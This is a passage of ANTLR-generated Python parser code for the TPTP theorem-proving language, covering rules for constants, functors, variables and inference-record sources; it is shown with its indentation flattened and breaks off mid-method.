def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.FunctorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_constant
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterConstant" ):
listener.enterConstant(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitConstant" ):
listener.exitConstant(self)
def constant(self):
localctx = tptp_v7_0_0_0Parser.ConstantContext(self, self._ctx, self.state)
self.enterRule(localctx, 288, self.RULE_constant)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1343
self.functor()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FunctorContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_functor
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFunctor" ):
listener.enterFunctor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFunctor" ):
listener.exitFunctor(self)
def functor(self):
localctx = tptp_v7_0_0_0Parser.FunctorContext(self, self._ctx, self.state)
self.enterRule(localctx, 290, self.RULE_functor)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1345
self.atomic_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class System_constantContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def system_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_functorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_system_constant
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSystem_constant" ):
listener.enterSystem_constant(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSystem_constant" ):
listener.exitSystem_constant(self)
def system_constant(self):
localctx = tptp_v7_0_0_0Parser.System_constantContext(self, self._ctx, self.state)
self.enterRule(localctx, 292, self.RULE_system_constant)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1347
self.system_functor()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class System_functorContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_system_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_system_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_system_functor
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSystem_functor" ):
listener.enterSystem_functor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSystem_functor" ):
listener.exitSystem_functor(self)
def system_functor(self):
localctx = tptp_v7_0_0_0Parser.System_functorContext(self, self._ctx, self.state)
self.enterRule(localctx, 294, self.RULE_system_functor)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1349
self.atomic_system_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_constantContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def defined_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_functorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_constant
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_constant" ):
listener.enterDefined_constant(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_constant" ):
listener.exitDefined_constant(self)
def defined_constant(self):
localctx = tptp_v7_0_0_0Parser.Defined_constantContext(self, self._ctx, self.state)
self.enterRule(localctx, 296, self.RULE_defined_constant)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1351
self.defined_functor()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_functorContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_defined_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_defined_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_functor
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_functor" ):
listener.enterDefined_functor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_functor" ):
listener.exitDefined_functor(self)
def defined_functor(self):
localctx = tptp_v7_0_0_0Parser.Defined_functorContext(self, self._ctx, self.state)
self.enterRule(localctx, 298, self.RULE_defined_functor)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1353
self.atomic_defined_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def number(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NumberContext,0)
def Distinct_object(self):
return self.getToken(tptp_v7_0_0_0Parser.Distinct_object, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_term" ):
listener.enterDefined_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_term" ):
listener.exitDefined_term(self)
def defined_term(self):
localctx = tptp_v7_0_0_0Parser.Defined_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 300, self.RULE_defined_term)
try:
self.state = 1357
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer]:
self.enterOuterAlt(localctx, 1)
self.state = 1355
self.number()
pass
elif token in [tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 1356
self.match(tptp_v7_0_0_0Parser.Distinct_object)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VariableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Upper_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Upper_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterVariable" ):
listener.enterVariable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitVariable" ):
listener.exitVariable(self)
def variable(self):
localctx = tptp_v7_0_0_0Parser.VariableContext(self, self._ctx, self.state)
self.enterRule(localctx, 302, self.RULE_variable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1359
self.match(tptp_v7_0_0_0Parser.Upper_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class SourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def dag_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Dag_sourceContext,0)
def internal_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Internal_sourceContext,0)
def external_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.External_sourceContext,0)
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def sources(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.SourcesContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSource" ):
listener.enterSource(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSource" ):
listener.exitSource(self)
def source(self):
localctx = tptp_v7_0_0_0Parser.SourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 304, self.RULE_source)
try:
self.state = 1369
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,98,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1361
self.dag_source()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1362
self.internal_source()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1363
self.external_source()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 1364
self.match(tptp_v7_0_0_0Parser.Lower_word)
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 1365
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1366
self.sources()
self.state = 1367
self.match(tptp_v7_0_0_0Parser.T__12)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class SourcesContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def source(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.SourceContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.SourceContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_sources
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSources" ):
listener.enterSources(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSources" ):
listener.exitSources(self)
def sources(self):
localctx = tptp_v7_0_0_0Parser.SourcesContext(self, self._ctx, self.state)
self.enterRule(localctx, 306, self.RULE_sources)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1371
self.source()
self.state = 1376
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1372
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1373
self.source()
self.state = 1378
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Dag_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def inference_record(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_recordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_dag_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDag_source" ):
listener.enterDag_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDag_source" ):
listener.exitDag_source(self)
def dag_source(self):
localctx = tptp_v7_0_0_0Parser.Dag_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 308, self.RULE_dag_source)
try:
self.state = 1381
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1379
self.name()
pass
elif token in [tptp_v7_0_0_0Parser.T__26]:
self.enterOuterAlt(localctx, 2)
self.state = 1380
self.inference_record()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Inference_recordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def inference_rule(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_ruleContext,0)
def useful_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Useful_infoContext,0)
def inference_parents(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_parentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_record
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_record" ):
listener.enterInference_record(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_record" ):
listener.exitInference_record(self)
def inference_record(self):
localctx = tptp_v7_0_0_0Parser.Inference_recordContext(self, self._ctx, self.state)
self.enterRule(localctx, 310, self.RULE_inference_record)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1383
self.match(tptp_v7_0_0_0Parser.T__26)
self.state = 1384
self.inference_rule()
self.state = 1385
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1386
self.useful_info()
self.state = 1387
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1388
self.inference_parents()
self.state = 1389
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Inference_ruleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_rule
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_rule" ):
listener.enterInference_rule(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_rule" ):
listener.exitInference_rule(self)
def inference_rule(self):
localctx = tptp_v7_0_0_0Parser.Inference_ruleContext(self, self._ctx, self.state)
self.enterRule(localctx, 312, self.RULE_inference_rule)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1391
self.atomic_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Inference_parentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def parent_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Parent_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_parents
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_parents" ):
listener.enterInference_parents(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_parents" ):
listener.exitInference_parents(self)
def inference_parents(self):
localctx = tptp_v7_0_0_0Parser.Inference_parentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 314, self.RULE_inference_parents)
try:
self.state = 1398
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 1393
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 1394
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1395
self.parent_list()
self.state = 1396
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Parent_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def parent_info(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Parent_infoContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Parent_infoContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_parent_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParent_list" ):
listener.enterParent_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParent_list" ):
listener.exitParent_list(self)
def parent_list(self):
localctx = tptp_v7_0_0_0Parser.Parent_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 316, self.RULE_parent_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1400
self.parent_info()
self.state = 1405
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1401
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1402
self.parent_info()
self.state = 1407
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Parent_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.SourceContext,0)
def parent_details(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Parent_detailsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_parent_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParent_info" ):
listener.enterParent_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParent_info" ):
listener.exitParent_info(self)
def parent_info(self):
localctx = tptp_v7_0_0_0Parser.Parent_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 318, self.RULE_parent_info)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1408
self.source()
self.state = 1410
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__13:
self.state = 1409
self.parent_details()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Parent_detailsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def general_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_parent_details
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParent_details" ):
listener.enterParent_details(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParent_details" ):
listener.exitParent_details(self)
def parent_details(self):
localctx = tptp_v7_0_0_0Parser.Parent_detailsContext(self, self._ctx, self.state)
self.enterRule(localctx, 320, self.RULE_parent_details)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1412
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 1413
self.general_list()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Internal_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def intro_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Intro_typeContext,0)
def optional_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Optional_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_internal_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInternal_source" ):
listener.enterInternal_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInternal_source" ):
listener.exitInternal_source(self)
def internal_source(self):
localctx = tptp_v7_0_0_0Parser.Internal_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 322, self.RULE_internal_source)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1415
self.match(tptp_v7_0_0_0Parser.T__27)
self.state = 1416
self.intro_type()
self.state = 1418
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1417
self.optional_info()
self.state = 1420
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Intro_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_intro_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIntro_type" ):
listener.enterIntro_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIntro_type" ):
listener.exitIntro_type(self)
def intro_type(self):
localctx = tptp_v7_0_0_0Parser.Intro_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 324, self.RULE_intro_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1422
self.match(tptp_v7_0_0_0Parser.Lower_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class External_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def file_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_sourceContext,0)
def theory(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.TheoryContext,0)
def creator_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Creator_sourceContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_external_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExternal_source" ):
listener.enterExternal_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExternal_source" ):
listener.exitExternal_source(self)
def external_source(self):
localctx = tptp_v7_0_0_0Parser.External_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 326, self.RULE_external_source)
try:
self.state = 1427
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__28]:
self.enterOuterAlt(localctx, 1)
self.state = 1424
self.file_source()
pass
elif token in [tptp_v7_0_0_0Parser.T__29]:
self.enterOuterAlt(localctx, 2)
self.state = 1425
self.theory()
pass
elif token in [tptp_v7_0_0_0Parser.T__30]:
self.enterOuterAlt(localctx, 3)
self.state = 1426
self.creator_source()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class File_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def file_name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_nameContext,0)
def file_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_file_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFile_source" ):
listener.enterFile_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFile_source" ):
listener.exitFile_source(self)
def file_source(self):
localctx = tptp_v7_0_0_0Parser.File_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 328, self.RULE_file_source)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1429
self.match(tptp_v7_0_0_0Parser.T__28)
self.state = 1430
self.file_name()
self.state = 1432
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1431
self.file_info()
self.state = 1434
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class File_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_file_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFile_info" ):
listener.enterFile_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFile_info" ):
listener.exitFile_info(self)
def file_info(self):
localctx = tptp_v7_0_0_0Parser.File_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 330, self.RULE_file_info)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1436
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1437
self.name()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TheoryContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def theory_name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Theory_nameContext,0)
def optional_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Optional_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_theory
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTheory" ):
listener.enterTheory(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTheory" ):
listener.exitTheory(self)
def theory(self):
localctx = tptp_v7_0_0_0Parser.TheoryContext(self, self._ctx, self.state)
self.enterRule(localctx, 332, self.RULE_theory)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1439
self.match(tptp_v7_0_0_0Parser.T__29)
self.state = 1440
self.theory_name()
self.state = 1442
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1441
self.optional_info()
self.state = 1444
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Theory_nameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_theory_name
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTheory_name" ):
listener.enterTheory_name(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTheory_name" ):
listener.exitTheory_name(self)
def theory_name(self):
localctx = tptp_v7_0_0_0Parser.Theory_nameContext(self, self._ctx, self.state)
self.enterRule(localctx, 334, self.RULE_theory_name)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1446
self.match(tptp_v7_0_0_0Parser.Lower_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Creator_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def creator_name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Creator_nameContext,0)
def optional_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Optional_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_creator_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCreator_source" ):
listener.enterCreator_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCreator_source" ):
listener.exitCreator_source(self)
def creator_source(self):
localctx = tptp_v7_0_0_0Parser.Creator_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 336, self.RULE_creator_source)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1448
self.match(tptp_v7_0_0_0Parser.T__30)
self.state = 1449
self.creator_name()
self.state = 1451
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1450
self.optional_info()
self.state = 1453
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Creator_nameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_creator_name
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCreator_name" ):
listener.enterCreator_name(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCreator_name" ):
listener.exitCreator_name(self)
def creator_name(self):
localctx = tptp_v7_0_0_0Parser.Creator_nameContext(self, self._ctx, self.state)
self.enterRule(localctx, 338, self.RULE_creator_name)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1455
